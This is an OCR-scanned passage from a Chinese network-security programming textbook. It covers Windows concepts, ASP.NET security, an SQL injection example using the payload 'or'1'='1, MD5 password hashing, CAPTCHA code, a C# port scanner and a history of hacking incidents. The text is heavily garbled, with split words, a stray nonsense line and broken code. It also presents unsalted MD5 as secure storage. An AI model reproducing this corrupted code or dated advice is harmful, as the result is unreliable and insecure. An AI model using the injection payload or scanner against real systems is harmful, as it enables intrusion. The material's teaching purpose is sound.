受 其 控制 的 一 部 分 矩形 屏幕 区 。 应 用 程序 生成 并 控制 与 窗口 有 关 的 一 切 内 容 ， 包 括 窗 口 的 
大 小 、 风 格 、 位 置 以 及 窗口 内 显示 的 内 容 等 。 用 户 打开 一 个 应 用 程序 后 ， 程 序 将 创建 一 个 
窗口 ， 并 在 那里 默默 地 等 待 用 户 的 要 求 。 每 当 用 户 选择 窗口 中 的 选项 ， 程 序 即 对 此 做 出 
响应 。 


克 缘 颁 会 扩大 理论 与 先王 


2. 程序 

通常 说 的 程序 都 是 指 一 个 能 让 计算 机 识别 的 文件 ， 接 触 最 多 的 是 以 .exe 作为 扩展 名 的 
可 执行 文件 。 

3. 进程 

进程 就 是 应 用 程序 的 执行 实例 (或 称 一 个 执行 程序 )， 进 程 是 程序 动态 的 描述 。 一 个 
以 .exe 作为 扩展 名 的 文件 ， 在 没有 被 执行 时 称 为 应 用 程序 ， 当 用 鼠标 双击 执行 以 后 ， 就 被 
操作 系统 作为 一 个 进程 执行 了 。 当 关机 或 者 在 任务 栏 的 图 标 上 右 击 鼠标 选 “ 退 出 ”时 ， 进 
程 便 消亡 ， 彻 底 结束 。 进 程 经 历 了 由 “创建 ”到 “消亡 ”的 生命 期 ， 而 程序 自始至终 存在 
硬盘 上 ， 不 管 计算 机 是 否 启动 。 

4. 线程 

线程 是 进程 中 的 一 个 执行 单元 , 同一 个 进程 中 的 各 个 线程 对 应 于 一 组 CPU 指令 、 一 组 
CPU 寄存 器 以 及 一 个 堆栈 。 进 程 具有 的 动态 含义 是 通过 线程 来 执行 体现 的 。 

$5. 消息 

消息 是 应 用 程序 和 计算 机 交互 的 途径 ， 在 计算 机 上 几乎 每 一 个 动作 都 会 产生 一 个 消 
息 ， 例 如 ， 鼠 标 移动 会 产生 WM_MOUSEMOVE 消息 ， 鼠 标 左 键 被 按 下 会 产生 WM_ 
LBUTTONDOWN 的 消息 ， 鼠 标 右 键 按 下 会 产生 WM_RBUTTONDOWN 消息 等 。 

6. 事件 

在 程序 运行 的 过 程 中 改变 窗口 的 大 小 或 者 移动 窗口 等 ， 都 会 触发 相应 的 “事件 ”从 
而 调用 相关 的 事件 处 理 函 数 。 

7. 句柄 

句柄 是 一 个 指针 ， 通 过 句柄 可 以 控制 该 句柄 指向 的 对 象 。 它 是 系统 用 来 标识 不 同 对 象 
类 型 的 工具 ， 如 窗口 、 菜 单 等 。 

8， API 与 SDK 

API 是 英文 Application Programming Interface 的 缩写 ， 意 为 “应 用 程序 接口 ”% 泛 指 
系统 为 应 用 程序 提供 的 一 系列 接口 函数 。 其 实质 是 程序 内 的 一 套 函 数 调用 ， 在 编程 的 时 候 
可 以 直接 调用 ， 而 不 必 知 道 其 内 部 实现 的 过 程 ， 只 知道 它 的 原型 和 返回 值 就 可 以 了 。 

SDK 是 英文 Software Development Kit 的 缩写 ， 指 “软件 开发 工具 包 ” 在 防火 墙 的 设 
计 中 就 经 常 涉及 到 SDK。 微软 公司 提供 了 许多 专门 的 SDK 开发 包 , 比如 DirectX 开发 包 和 
语音 识别 开发 包 等 。 
3.1.2 编程 语言 


编程 语言 是 人 机 通信 的 工具 之 一 ， 使 用 这 类 语言 “指挥 ”计算 机 干什么 ， 它 的 特点 必 
然 会 影响 人 的 思维 和 解 题 方 式 ， 会 影响 人 和 计算 机 通信 的 方式 和 质量 ， 也 会 影响 其 他 人 阅 
读 和 理解 程序 的 难 易 程 度 。 因 此 ， 网 络 安全 编程 之 前 的 一 项 重要 工作 就 是 选择 一 种 适当 的 
编程 语言 。 

编程 语言 的 类 型 可 分 为 命令 式 语 言 、 函 数 式 语言 、 罗 辑 式 语 言 以 及 面向 对 象 语言 。 

1， 命令 式 语言 

这 种 语言 的 语义 基础 是 模拟 “数据 存储 /数据 操作 ”的 图 灵机 可 计算 模型 ， 十 分 符合 现 
代 计 算 机 体系 结构 的 自然 实现 方式 。 其 中 产生 操作 的 主要 途径 是 依赖 语句 或 命令 产生 的 副 


作用 。 现 代 流 行 的 大 多 数 语言 都 是 这 一 类 型 ， 比 如 C、CH+H+、Basic、Ada、Java、C# 等 ， 
各 种 脚本 语言 也 被 看 做 是 此 种 类 型 。 

2. 函数 式 语言 

这 种 语言 的 语义 基础 是 基于 数学 函数 概念 的 值 映射 的 4 算 子 可 计算 模型 。 这 种 语言 非 
常 适用 于 进行 人 工 智 能 等 工作 的 计算 。 典 型 的 函数 式 语言 如 Lisp、Haskell、.ML、Scheme 等 。 

3。 逻辑 式 语言 

这 种 语言 的 语义 基础 是 基于 一 组 已 知 规则 的 形式 逻辑 系统 。 这 种 语言 主要 用 在 专家 系 
统 的 实现 中 ， 最 著名 的 轴 辑 式 语 言 是 Prolog。 

4. 面向 对 象 语 言 

现代 语言 中 的 大 多 数 都 提供 面向 对 象 的 支持 ， 但 有 些 语 言 是 直接 建立 在 面向 对 象 基本 
模型 上 的 , 语言 的 语法 形式 的 语义 就 是 基本 对 象 操作 。 主要 的 纯 面 向 对 象 语言 是 Smalltalk。 

虽然 各 种 编程 语言 属于 不 同 的 类 型 ， 但 它们 各 自 都 不 同 程度 地 对 其 他 类 型 的 运算 模式 
有 所 支持 。 


3.2 ASP.NET 语言 编程 


在 网 络 安全 编程 方面 ， 由 于 ASPNET 语言 越 来 越 流行 和 重要 ， 所 以 本 书 主要 介绍 
ASPNET 语言 的 网 络 安全 编程 知识 。 

ASPNET 是 Microsoft 公司 推出 的 新 一 代 建 立 动态 Web 应 用 程序 开发 平台 ， 可 以 把 程 
序 开发 人 员 的 工作 效率 提升 到 其 他 技术 无 法 比拟 的 程度 ， 与 Java、PHP、ASP3.0、Prel 等 
语言 相 比 ，ASPNET 具有 方便 性 、 灵 活性 、 性 能 优 、 生 产 效率 高 、 安 全 性 高 、 完 整 性 强 及 
面向 对 象 等 特性 ， 是 目前 主流 的 网 络 编程 工具 之 一 。 
3.2.1 ASP.NET 的 安全 性 


从 应 用 程序 的 角度 来 看 ， 安 全 性 主要 是 对 用 户 进行 身份 验证 ， 以 及 授予 其 对 系统 资源 
的 操作 权限 。ASPNET 结合 了 IS、.NET Framework 和 操作 系统 的 底层 安全 服务 ， 提 供 了 
多 种 身份 验证 和 授权 机 制 。 一 个 ASPNET 应 用 程序 的 总 的 安全 性 是 由 以 下 三 个 不 同 层级 
组 成 : 
。 IIS 级 将 一 个 有 并 入 的 安全 性 令 牌 (security token) 与 请 求 的 发 送 者 相关 联 。 该 安全 
性 令 牌 根据 当前 的 IS 身份 验证 机 制 确定 。 
。 ASPNET 工作 进程 级 确定 ASPNET 工作 进程 中 服务 请 求 的 线程 的 身份 。 如 果 启 用 
了 假冒 设置 ， 可 能 会 改变 与 该 线程 关联 的 安全 性 令 牌 。 根 据 正在 使 用 的 进程 模型 ， 
其 安全 性 令 牌 由 配置 文件 或 HS 原 数 据 库 中 的 设置 决定 。 
。 ASPNET 管道 级 获得 使 用 应 用 程序 的 特定 用 户 的 身份 。 该 任务 的 完成 方式 取决 于 配 
置 文件 中 用 于 身份 验证 和 授权 的 应 用 程序 设置 。 大 多 数 ASPNET 应 用 程序 的 常见 
设置 是 使 用 窗 体验 证 。 


3.2.2 身份 验证 
身份 验证 是 指 以 下 过 程 : 获取 标识 凭据 (如 用 户 名 和 密码 )， 并 对 照 某 一 颁发 机 构 来 
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验证 这 些 凭据 。ASPNET 提供 了 4 个 身份 验证 提供 程序 : 表单 身份 验证 、Windows 身份 验 
证 、Passport 身份 验证 和 默认 身份 验证 。 

1. 表单 身份 验证 

表单 身份 验证 是 指 以 下 系统 : 将 未 经 身份 验证 的 请 求 重 定向 到 一 个 超 文本 标记 语言 
(HTML) 表单 ， 使 用 户 能 够 在 其 中 输入 他 们 的 凭据 。 在 用 户 提供 凭据 并 提交 该 表单 后 ， 应 
用 程序 对 请 求 进行 身份 验证 ， 然 后 系统 以 Cookie 的 形式 发 出 身份 验证 票证 。 此 Cookie 包 
含 凭据 或 用 于 重新 获取 标识 的 密 钥 。 浏 览 器 的 后 续 请 求 自动 包含 此 Cookie。 

2. Windows 身份 验证 

在 Windows 身份 验证 中 , IS 执行 身份 验证 , 并 将 经 过 身份 验证 的 标记 传递 给 ASPNET 
工作 进程 。 使 用 Windows 身份 验证 的 优点 是 它 需要 的 编码 最 少 。 在 将 请 求 传递 给 ASPNET 
之 前 ， 用 户 可 能 需要 使 用 Windows 身份 验证 来 模拟 IS 进行 验证 的 Windows 用 户 账户 。 

3. Passport 身份 验证 

了 Passport 身份 验证 是 Microsoft 提供 的 集中 式 身份 验证 服务 ， 它 为 成 员 站 点 提供 单一 登 
录 和 核心 配置 文件 服务 。 通 常 ， 当 需要 跨越 多 个 域 的 单一 登录 功能 时 ， 将 使 用 Passport 身 
份 验 证 。 

4. 默认 身份 验证 
当 Web 应 用 程序 不 需要 任何 安全 功能 时 ， 将 使 用 默认 身份 验证 ; 此 安全 提供 程序 需要 
匿名 访问 。 在 所 有 的 身份 验证 提供 程序 中 ， 默 认 身份 验证 为 应 用 程序 提供 了 最 高 的 性 能 。 
当 使 用 自己 的 自 定 义 安全 模块 时 ， 也 可 以 使 用 此 身份 验证 提供 程序 。 


3.2.3 授权 


授权 是 指 验证 经 身份 验证 的 用 户 是 否 可 以 访问 请 求 资源 的 过 程 。ASPNET 提供 两 种 授 
权 提 供 程序 ，FileAuthorization 和 UrlAuthorization 。 

1. FileAuthorization 

FileAuthorizationModule 类 进行 文件 授权 ， 而 且 在 使 用 Windows 身份 验证 时 处 于 活 
动 状 态 。FileAuthorizationModule 负责 对 Windows 访问 控制 列表 (ACL) 进行 检查 ， 以 确 
定 用 户 是 否 应 该 拥有 访问 权限 。 

2. UrlAuthorization 

UrlAuthorizationModule 类 进行 统一 资源 定位 器 (URL) 授 权 ,， 它 基于 URI 命名 空间 来 控 
制 授权 。URI 命名 空间 可 能 与 NTFS 权限 使 用 的 物理 文件 夹 和 文件 路 径 存 在 很 大 的 差异 。 
UrlAuthorizationModule 实现 肯定 和 否定 的 授权 断言 , 即 可 以 使 用 该 模块 有 选择 性 地 允许 或 
拒绝 访问 用 户 、 角 色 (如 manager、tester 和 administrator) 和 谓词 (如 GET 和 POST) 的 
URI 命 名 空间 的 任意 部 分 。 


3.3 ”网 络 安全 编程 实例 


下 面 以 实例 介绍 使 用 ASPNET 语言 来 实现 各 种 网 络 安全 编程 技术 。 
3.3.1 防止 SQL 注入 式 攻击 技术 
在 一 个 程序 中 ， 当 验证 用 户 输入 的 邮箱 账号 和 密码 时 ， 由 于 用 户 的 邮箱 账号 和 密码 保 


存在 数据 库 中 ， 所 以 在 验证 时 需要 防止 SQL 注入 攻击 ，SQL 注入 攻击 是 指 利用 SQL 语言 
设计 上 的 漏洞 ， 在 目标 服务 器 上 运行 SQL 命令 以 及 进行 其 他 方式 的 攻击 。 

例如 ， 在 登录 页 面 里 添加 一 个 文本 框 用 来 输入 邮箱 账号 ， 一 个 按钮 用 来 登录 。 在 文本 
框 中 输入 邮箱 账号 “zs@sohu.com”， 然 后 用 SQL 语句 查找 出 数据 库 中 符合 条 件 的 记录 有 


儿 条 。SQL 语句 为 : 


select * from UserInfo where UserMail=" zs@sohu.com' 


通过 上 面 的 语句 可 以 在 数据 库 中 查询 出 一 条 userMail 字段 为 zs@sohu.com 的 用 户 信 


息 。SQL 语句 的 运行 结果 如 图 3-1 所 示 。 


SQLQuery1Lsql - LLY-PC\-.\Adm... (52))*| 


到 区 
= 
select * from UserInfo where UserMail='zs@sohu.com' S 
4 区 Tm » 
国 结果 此 消息 - 
UserlD UserMail UserPassword RealName Sex Bithday Cy 
1 上 wesohucom zs 张 三 M 


图 3-1 SQL 语句 查询 结果 


如 果 在 文本 框 中 输入 “zs@sohu.com'orl='1”， 那 么 SQL 语句 为 : 


Select * from UserInfo where UserMail=" 


SQL 语句 的 运行 结果 如 图 3-2 所 示 。 


zs@sohu.com'or'1'="'1" 


SQLQuery1sql - LLY-PO\\Adm... (52))*| 


select * from UserInfo where UserMail='zs@sohu.com'or'1'='1' 入 


上 
国 结果 | 恩 . 消 息 
UserD UserMail UserPassword RealName Sex Bithday Cty | 
1 [1 | yhelo@eyoucom Iyhelo 张 一 F 1981:02:2100:00:00.000 045] 
Bel 2 zs@sohu com zs = M 。 19860202 00.00.00000 010 
Bsn| 3 isi@sohucom 。 盯 李 四 M 198902.0200:00:00.000 -010 
4 4 ww@sohucom ww 王 五 F 1980040200:00:00.000 045] 


图 3-2 SQL 语句 查询 结果 
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通过 两 条 SQL 语句 的 查询 结果 ， 可 见 都 能 查询 到 用 户 信息 ， 为 了 防止 SQL 语句 的 注 
入 式 攻击 ， 通 常 使 用 ADO.NET 技术 中 的 SqlCommand.Parameters 属性 传 参 的 方式 将 非法 
字符 单 引 号 “'” 过 滤 掉 ， 这 样 or 语句 就 不 起 作用 了 。 

在 ASPNET 中 过 滤 SQL 非法 字符 ， 首 先 需 要 添加 Parameters 参数 的 名 称 、 类 型 和 大 
小 ， 然 后 设置 参数 的 值 ， 最 后 使 用 ADO.NET 技术 执行 查询 数据 。 关 键 代码 如 下 : 


com.Parameters.Add (new SqlParameter("@usermail",SqlDbType.Varchar, 50)); 


com.Parameters["@usermail"] .Value = TextName.Text; 
3.3.2 无 解密 MDS 加 密 技 术 


为 了 提高 密码 的 安全 性 ， 可 以 在 程序 中 将 用 户 设置 的 密码 存 入 数据 库 前 使 用 MD5 加 
密 ， 当 用 户 登录 时 ， 只 需要 将 密码 使 用 MD5 加 密 ， 然 后 与 数据 库 中 的 密 文 进行 判断 ， 密 
文 一 样 则 密码 正确 ， 反 之 则 密码 错误 。 用 户 登录 流程 图 如 图 3-3 所 示 。 


. 
提取 用 户 输入 的 
用 户 名 、 密 码 数据 


提示 用 户 名 或 密码 错误 性 一 一 一 一 一 一 一 NN 一 一 


1 
对 用 户 密码 i rh 
进行 加 密 /wr 
用 户 上 本 
根据 用 户 名 在 数据 库 中 /密码 数据 2 


查找 加 密 后 的 密码 了 
进入 主页 
图 3-3 用 户 登录 流程 图 


加 密 一 般 有 两 种 : 双向 加 密 和 单 向 加 密 。 双 向 加 密 最 常用 ， 它 既 能 加 密 又 能 解密 ; 单 
向 加 密 只 能 对 数据 进行 加 密 ， 不 能 对 其 解密 。MD5 加 密 属 于 单 向 加 密 。MD5 加 密 是 根据 
指定 的 密码 和 哈 希 算法 生成 一 个 适合 于 存储 在 配置 文件 中 的 哈 希 密码 。 命 名 空间 为 
System.Web.Security。 语 法 如 下 : 


public static string HashPasswordForStoringLnConfigFile (string password, 
String passwordFormat) 


其 中 参数 password 表示 要 进行 哈 希 运算 的 密码 ;passwordFormat 表示 要 使 用 的 哈 希 算法 ， 
它 是 一 个 String， 表 示 FormsAuthPasswordFormat 枚 举 值 之 一 。 
将 用 户 输入 的 密码 使 用 MD5 进行 加 密 ， 关 键 代码 如 下 。 
string pass = FormsAuthentication.HashPasswordForStoringLnConfigFile 
(txtUserpass.Text, "MD5"); 


如 果 不 采用 加 密 方 案 进 行 加 密 ， 数 据 库 表 (UserInfo〉 中 的 密码 字段 (UserPassword) 


中 的 数据 为 用 户 注 册 时 输入 的 原始 数据 ， 如 图 3-4 所 示 ， 可 以 称 为 明文 存储 。 


UserlD UserMail UserPassword RealName Sex Bithday Cty 
| | wheloeeyou com ”helo 张 一 F 1981.02.21 00:00:00.000 ”0451 
zs@sohu.com zs 张 三 M 。 1986.0202 00:00:00.000 -010 
lisi@sohu.com lisi 李 四 M 。 19890202 00:00:00.000 -010 
ww@sohucom ww 五 F 1980.0402 00:00:00.000 ”0451 


一 


图 3-4 ”加 密 前 数据 表 


当 采 用 MD5 加 密 算 法 进行 加 密 后 ,数据 库 表 中 存储 的 为 加 密 后 的 数据 , 如 图 3-5 所 示 
可 以 称 为 密 文 存储 。 


UserPassword RealName Sex Birthday Cy 

MY76GYHDJD... 张 一 F 1981-02-21 00:00:00.000 ”0451 
89JKLJ IUER78...， 张 三 M 1986-02-02 00:00:00.000 010 
HFYE8RHFI8D1...。 李 四 M 1989-02-02 00:00:00.000 010 
FDHEMD65J7H. 王 五 F 1980-04-02 00:00:00.000 ”0451 


图 3-5 加 密 后 数据 表 


3.3.3 ”网 站 安全 验证 码 技术 


网 站 安全 验证 码 技 术 ， 就 是 将 一 串 随 机 产生 的 数字 生成 一 幅 图 片 ， 在 图 片 里 加 上 一 些 
干扰 像素 , 用 户 通 过 肉眼 识别 其 中 的 验证 码 ( 一 串 数字 ), 并 在 文本 框 中 输入 正确 的 验证 码 ， 
验证 成 功 后 程序 才能 进行 其 他 工作 。 验 证 码 能 够 有 效 防止 非法 程序 暴力 破解 ， 尤 其 是 一 些 
非法 用 户 利用 网 站 注册 与 登录 安全 性 能 低 的 情况 ,使 用 机 器 人 程序 自动 注册 、 登 录 “ 灌 水 ”， 
如 果 采 用 了 验证 码 技术 ， 就 可 以 有 效 地 解决 这 个 难题 。 

在 本 程序 中 的 验证 码 是 根据 程序 需求 产生 固定 数量 的 随机 数字 和 背景 噪点 组 合 而 成 
的 。 随 机 数 的 生成 主要 是 使 用 Random 类 对 象 中 的 成 员 方法 Next 来 实现 的 。 示 例 代 码 如 下 : 


public string RandNum(int codeNum) 
本 
string result = ""; 
string[] codeChar = new string[46] {"0","1","2","3","4","5","6", 
Bd dd edt dd a ed Dd thd ri he a et a ht id el ae 
On i ne i Oe Do Oe Re tr 
bel Lee a dd 
Random rand = new Random(); 
for (int i = 1; i <= codeNum; i++) 
{ 
int j = rand.Next (codeChar .Length ); 
result += codeChar[j]; 
} 


return result; 
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随机 数 产生 后 ， 需 要 为 背景 添加 噪点 ， 添 加 噪点 的 目的 是 使 随机 数 不 会 轻易 被 非法 机 


器 人 程序 辨别 验证 码 。 噪 点 主要 是 使 用 Graphics 对 象 中 的 DrawLine 方法 添加 彩色 噪点 线 ， 


Bitmap 对 象 中 的 SetPixel 方法 添加 彩色 噪点 。 示 例 代 码 如 下 : 


public void CreageImage (string randNum) 

{ 
int iwidth = randNum.Length * 13; 
Bitmap image = new Bitmap (iwidth, 23); 
Graphics g = Graphics.FromImage (image); 
g.Clear (Color -White ); 


Color [] color = {Color .Green ,Color .Red,Color .Black ,Color .Blue ， 


Color.Orange }; 


string[] font = { "宋体 ", "黑体 ", "Verdana", "Microsoft Sans Serif", "Comic 


Sans MS", "Arial™ }; 
Random rand = new Random(); 
for (int i = 0; i < 50; i++) 
{ 
int x = rand.Next (image.Width); 
int y = rand.Next (image.Height); 
g.DrawRectangle (new Pen(Color.LightGray, 0), x, y, 1, 
} 
for (int i = 0; i < randNum.Length; i++) 
{ 


int m rand.Next (5); 
rand.Next (6); 


Color c = color[m]; 


int n 


Font f = new Font(font[n], 10, System.Drawing.FontStyle.Bold); 


Brush b = new SolidBrush(color[m]); 


g.DrawString (randNum.Substring (i,1), f, b, 3 + (i * 12), 0); 


} 


g.DrawRectangle (new Pen(Color.DarkGray, 0), 0, 0, image.Width - 1, 


image.Height - 1); 

MemoryStream stream = new MemoryStream(); 
image.Save (stream , ImageFormat.Jpeg); 
Response.ClearContent (); 
Response.ContentType = "image/Jpeg"; 
Response.BinaryWrite (stream.ToArray ()); 
g.Dispose(); 

image.Dispose(); 


} 
程序 运行 后 生成 验证 码 如 图 3-6 所 示 。 


Wi: SNB 


刷新 给 证 码 
和 登录 | 注册 


图 3-6 验证 码 


3.3.4 网 络 扫描 器 


网 络 扫描 器 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ， 通 过 使 用 扫描 器 可 以 
丝毫 不 留 痕迹 地 发 现 远 程 服 务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 , 这 就 能 让 我 们 间接 
或 直观 地 了 解 到 远程 主机 所 存在 的 安全 问题 。 

1. 关键 技术 

1) System.Net.Sockets 简介 

在 .Net 框架 中 System.NetSockets 命名 空间 为 需要 严密 控制 网 络 访问 的 开发 提供 了 
Windows Sockets (Winsock) 接口 的 托管 实现 。System.Net.Sockets 命名 空间 主要 提供 制作 
Sockets 网 络 应 用 程序 的 相关 类 , 其 中 几 个 比较 重要 的 类 有 Socke 类 、Tcplient 类 、TcpListener 
类 以 及 UdpClient 类 。 其 中 TepClient 提供 TCP 网 络 服务 的 客户 端 连接 ， 可 以 利用 创建 
TcpClient 实例 对 象 ， 提 供 TCP 网 络 服务 的 客户 端 应 用 程序 与 服务 沟通 ， 这 个 类 定义 了 一 
个 方法 Connect0， 用 以 连接 因特网 的 远程 主机 ， 其 中 包含 三 个 重 载 版 本 。 

第 一 个 版 本 的 定义 如 下 : 

public void Connect (ITPEndPoint remoteEP); 

这 个 方法 接受 一 个 客户 端的 连接 要 求 ，IPEndPoint 为 一 个 设计 用 以 表示 IP 地 址 和 通 
信 端 口 编号 类 ，remoteEP 对 象 则 包含 所 要 连接 的 终点 IP 地 址 以 及 连接 端口 等 信息 。 该 方 
法 用 以 直接 连接 至 参数 所 指定 的 网 络 端 终 点 。 

第 二 个 版 本 的 定义 如 下 : 


public void Connect (IPAddress address,int port); 


其 中 address 为 一 IPAddress 类 对 象 ，IPAddress 类 被 用 以 表示 因特网 上 一 个 特别 的 地 
址 。Port 则 为 一 个 int 类 型 的 参数 值 代表 所 要 连接 的 主机 通信 端口 编号 。 
第 三 个 版 本 的 定义 如 下 : 


public void Connect (string hostname, int port); 


其 中 的 hostname 为 一 个 string 类 型 的 主机 名 字符 串 ， 代 表 所 要 连接 的 网 络 终 点 。 

这 些 方 法 皆 是 经 过 指定 IP 地 址 以 及 通信 端口 编号 进行 连接 ， 而 在 网 络 连接 过 程 中 ， 
若是 没有 连接 成 功 的 话 ， 系 统 会 抛 出 一 个 SocketException 异常 。 

使 用 Connect0 方 法 探测 ， 用 来 与 每 一 个 感 兴趣 的 目标 计算 机 的 端口 进行 连接 ， 如 果 端 
口 处 于 侦 听 状态 , 那么 Connect0 就 能 成 功 ; 否则 , 这 个 端口 是 不 能 用 的 , 即 没有 提供 服务 。 
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关键 代码 如 下 : 


TcpClient tcp=new TcpClient () 7 
tcp.Connect (_IpAddress,int.Parse( ScanPort)); 


其 中 _IpAddress 为 要 进行 扫描 的 卫 地 址 ，_ScanPort 为 要 进行 扫描 的 端口 号 。 

2) 在 程序 中 使 用 线程 

首先 ， 必 须 有 一 个 线程 函数 。 然 后 ， 创 建 线 程 对 象 。 在 一 个 线程 开始 的 时 候 ， 调 用 该 
程序 以 执行 线程 的 实际 工作 。 当 这 个 程序 终止 时 ， 该 线程 也 终止 了 。 关 键 代 码 如 下 : 


public void ThreadMethord () 
{ 
int number=0; 
while (true) 
{ 
// Thread.Sleep 方 法 用 于 将 一 个 线程 暂停 一 段 时 间 
thread.Sleep(1000); 
numbertt+; 
Console.WriterLine ("number: {0}",number); 
} 
} 
// 然 后 创建 线程 启用 它 : 
Thread myThread=new Thread (new ThreadStart (ThreadMethord)); 


MyThread.Start () 7 


3) IP 与 端口 的 遍历 

.Net 为 我 们 提供 了 IPAddress 类 ， 其 中 有 Address 这 个 属性 ， 它 将 带 有 了 全 格式 的 地 址 
转换 成 长 整形 的 地 址 ， 当 我 们 再 次 转换 成 卫 地 址 的 时 候 ， 顺 序 已 经 倒置 了 ， 所 以 需要 处 
理 一 下 。 方法 GetScanIPAddress 的 主要 作用 就 是 实现 IP 地 址 的 循环 , 为 了 实现 这 一 功能 ， 
首先 把 用 户 输入 的 人 P 地 址 根据 “.” 分 割 存 入 数组 中 ， 倒 序 排列 组 成 新 的 字符 串 ,然后 转化 
成 可 以 循环 的 他 ， 关 键 代码 如 下 


string[] sIPA = this.txtStartIP.Text.Trim() .Split ('.');// 将 IP 地 址 按 "." 分 割 


存 入 数组 中 
// 将 数组 的 项 倒序 组 成 新 的 字符 串 
string numIPA =sIPA[3]+"."+sIPA[2]+"."+sIPA[1]+"."+sIPA[0]; 
// 将 字符 串 转 化 成 ITP 地 址 


long numIPStart = System.Net.IPAddress.Parse (numIPA) .Address; 

// 实 现 IP 地 址 循环 之 后 再 还 原 它 : 

// 变 量 i 为 当前 循环 的 TP 地址 的 循环 变量 。 

// 将 IP 地 址 分 割 存 入 数组 中 

string[] IPCurrent= (new System-Net.IPAddress (1I) .ToString()) .Split('.'); 
string IPAddCurrent = IPCurrent [3] + "-"+IPCurrent [2] + "." + IPCurrent [1] 
+ IPCUurrenti0ls 


2. 网 络 扫 描 器 
网 络 扫描 器 程序 运行 结果 如 图 3-7 所 示 。 


Sean: |192.168.8.112 START 


Sené Port: [373 Recv Port: [135 
StopPort: [65536 Deay sy: [0 


| 
1Quickscan 三 Baits: 

2Reset on hakt 厂 F es 
3Saveonbatt 厂 


图 3-7 网 络 扫描 器 


思考 与 练习 


1. 简 述 Windows 操作 系统 的 内 部 机 制 。 
2. 编写 程序 实现 网 络 扫描 器 。 
3. 编写 程序 实现 功能 : 当 用 户 用 鼠标 双击 一 个 文本 文件 时 ， 自 动 删除 该 文件 。 
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第 4 章 黑客 与 隐藏 IP 技术 


本 章 学 习 目 标 : 

。 了 解 黑客 精神 和 守则 ; 

。 掌握 安全 攻击 的 分 类 ; 

。 掌握 代理 跳板 的 原理 和 方法 。 


4.1 黑 客 


4.1.1 什么 是 黑客 


黑客 其 实 是 Hacker 的 音译 ， 源 于 动词 Hack， 其 引申 意义 是 指 “ 干 了 一 件 非常 漂亮 的 
事 ” 在 这 里 我 们 说 的 黑客 是 指 那些 精 于 某 方面 技术 的 人 。 对 于 计算 机 而 言 ， 黑 客 就 是 精通 
网 络 、 系 统 、 外 设 以 及 软 硬 件 技术 的 人 。 黑 客 的 存在 是 由 于 计算 机 技术 的 不 健全 ， 从 某 种 
意义 上 讲 ， 计 算 机 的 安全 需要 更 多 黑客 去 维护 。 

黑客 最 早 开 始 于 20 世纪 50 年 代 ， 最 早 的 计算 机 于 1946 年 在 宾夕法尼亚 大 学 诞生 ， 
而 最 早 的 黑客 出 现 于 麻 省 理工 学 院 。 最 初 的 黑客 一 般 都 是 一 些 高 级 的 技术 人 员 ， 他 们 热衷 
于 挑战 、 崇 尚 自由 并 主张 信息 的 共享 。 

但 到 了 今天 ， 黑 客 一 词 已 被 泛 指 那些 专门 利用 计算 机 搞 破坏 或 恶作剧 的 家 伙 ， 对 这 些 
人 的 正确 叫 法 是 Cracker， 有 人 也 翻译 成 骇 客 或 是 入 侵 者 。 从 下 面 介 绍 的 10 个 著名 黑客 事 
件 案例 中 可 以 发 现 ， 正 是 由 于 入 侵 者 的 出 现 天 污 了 黑客 的 声誉 ， 使 人 们 把 黑客 与 入 侵 者 混 
为 一 谈 ， 黑 客 被 人 们 认为 是 在 网 上 到 处 搞 破坏 的 人 。 

1983 年 ， 凯 文 。 米 特 尼 克 因 被 发 现 使 用 一 台大 学 里 的 电脑 擅自 进入 互联 网 的 前 身 ARPA 
网 ， 并 通过 该 网 进入 了 美国 五 角 大 楼 的 电脑 ， 而 被 判 在 加 州 的 青年 管教 所 管教 了 6 个 月 。 

1988 年 ， 凯 文 。 米 特 尼 克 被 执法 当局 逮捕 ， 原 因 是 DEC 指控 他 从 公司 网 络 上 盗 取 了 
价值 100 万 美元 的 软件 ， 并 造成 了 400 万 美元 损失 。 

1993 年 ， 自 称 为 “骗局 大 师 ” 的 组 织 将 目标 锁定 为 美国 电话 系统 ， 这 个 组 织 成 功 入 侵 
美国 国家 安全 局 和 美利坚 银行 , 他 们 建立 了 一 个 能 绕 过 长 途 电话 呼叫 系统 而 侵入 专线 的 系统 。 

1995 年 ,来自 俄 罗斯 的 黑客 弗 拉 季 米 尔 。 列 宁 在 互联 网 上 上 演 了 精彩 的 偷 天 换 日 ， 他 
是 历史 上 第 一 个 通过 入 侵 银 行 电脑 系统 来 获 利 的 黑客 ，1995 年 ， 他 侵入 美国 花旗 银行 并 盗 
走 一 千 万 ， 于 1995 年 在 英国 被 国际 刑警 逮捕 。 

1999 年 ， 梅 利 莎 病毒 (Melissa) 使 世界 上 300 多 家 公司 的 电脑 系统 崩溃 ， 该 病毒 造成 
的 损失 接近 4 亿美 金 ， 它 是 首 个 具有 全 球 破坏 力 的 病毒 ， 该 病毒 的 编写 者 戴 维 。 史 密斯 被 
判处 5 年 徒刑 。 


2000 年 ， 年 仅 15 岁 ， 绰 号 黑手 党 男孩 的 黑客 在 2000 年 2 月 6 日 到 2 月 14 日 情人 节 
期 间 成 功 侵入 包括 雅虎 .eBay 在 内 的 大 型 网 站 服务 器 , 他 成 功 阻 止 服务 器 向 用 户 提供 服务 
于 2000 年 被 捕 。 

2007 年 ， 一 名 中 国 腾讯 网 名 为 The Silents〈 折 羽 鸿 条 ) 的 黑客 在 6 月 至 11 月 成 功 侵 
入 包括 CCTV、163、TOM 等 中 国 大 型 门户 服务 器 。 

2008 年 ， 一 个 全 球 性 的 黑客 组 织 ， 利 用 ATM 欺诈 程序 在 一 夜 之 间 从 世界 49 个 城市 
的 银行 中 盗 走 了 900 万 美元 。 黑 客 们 攻破 的 是 一 种 名 为 RBS WorldPay 的 银行 系统 ， 用 各 
种 技巧 取得 了 数据 库 内 的 银行 卡 信息 ， 并 在 11 月 8 日 午夜 ， 利 用 团伙 作案 从 世界 49 个 城 
市 总 计 超过 130 台 ATM 机 上 提取 了 900 万 美元 。 

2009 年 7 月 7 日 ,韩国 遭受 有 史 以 来 最 猛烈 的 一 次 攻击 。 韩 国 总 统 府 、 国 会 、 国 情 院 
和 国防 部 等 国家 机 关 ， 以 及 金融 界 、 媒 体 和 防火 墙 企 业 网 站 受到 了 攻击 。9 日 韩国 国家 情 
报 院 和 国民 银行 网 站 无 法 被 访问 。 韩 国 国会 、 国 防 部 、 外 交通 商 部 等 机 构 的 网 站 一 度 无 法 
打开 ， 这 是 韩国 遭遇 的 有 史 以 来 最 强 的 一 次 黑客 攻击 。 

